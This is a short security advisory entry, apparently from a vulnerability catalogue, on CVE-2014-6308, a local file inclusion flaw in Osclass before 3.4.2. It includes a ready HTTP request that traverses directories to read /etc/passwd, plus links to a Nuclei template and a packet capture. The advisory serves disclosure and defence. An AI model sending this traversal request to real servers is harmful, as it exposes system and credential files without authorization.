| Title | Osclass Security Advisory 3.4.1 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. |
| Remediation | Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.69729 |
| CVE ID | CVE-2014-6308 |
| CWE ID | CWE-22 |
| Tags | cve2014 cve lfi packetstorm osclass vuln |
A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.
GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/6.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-6308.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-6308.pcap
N/AN/A